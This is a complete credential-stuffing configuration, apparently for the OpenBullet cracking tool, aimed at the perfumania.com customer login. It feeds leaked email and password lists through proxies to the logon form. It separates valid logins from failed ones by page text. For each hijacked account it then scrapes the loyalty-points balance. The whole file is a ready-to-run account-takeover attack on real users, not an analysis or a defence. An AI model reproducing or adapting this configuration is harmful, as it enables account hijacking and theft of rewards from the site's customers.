[SETTINGS]
{
  "Name": "perfumania.com",
  "SuggestedBots": 150,
  "LastModified": "2018-06-13T15:55:32.4798824+00:00",
  "AdditionalInfo": "",
  "Author": "Dreamzje [ KEEPIT.ONLINE ]",
  "Version": "1.0.0",
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
#POST_REQUEST REQUEST POST "https://www.perfumania.com/Logon?langId=-1&storeId=10801&catalogId=10551" AutoRedirect=TRUE 
  CONTENT "reLogonURL=LogonForm&personalizedCatalog=true&fromOrderId=*&toOrderId=.&previousPage=logon&returnPage=&URL=%2FOrderItemMove%3FURL%3DOrderCalculate%253fURL%253d%252fuser%252fmy-account.html%253fpage%253daccount%26fromOrderId%3D*%26toOrderId%3D.%26deleteIfEmpty%3D*%26continue%3D1%26createIfEmpty%3D1%26calculationUsageId%3D-1%26calculationUsageId%3D-2%26calculationUsageId%3D-3%26calculationUsageId%3D-7%26updatePrices%3D1&rewardsNum=&email1=<USER>&logonPassword=<PASS>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Referer: https://www.perfumania.com/user/sign-in.html" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=FALSE 
  KEYCHAIN Failure OR 
    KEY "Email is not registered" 
    KEY "Either the email address or password is incorrect" 
    KEY "class=\"welcome-logged-out\"" 
  KEYCHAIN Success OR 
    KEY ">Log off<" 
#GET_REQUEST REQUEST GET "https://www.perfumania.com/RewardsInfo?storeId=10801&catalogId=10551&langId=-1" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=FALSE 
  KEYCHAIN Success OR 
    KEY "Current Points Balance:" 
PARSE "<SOURCE>" LR "				            	<span>" "</span>" Recursive=TRUE -> CAP "Loyalty Info" "" "" 
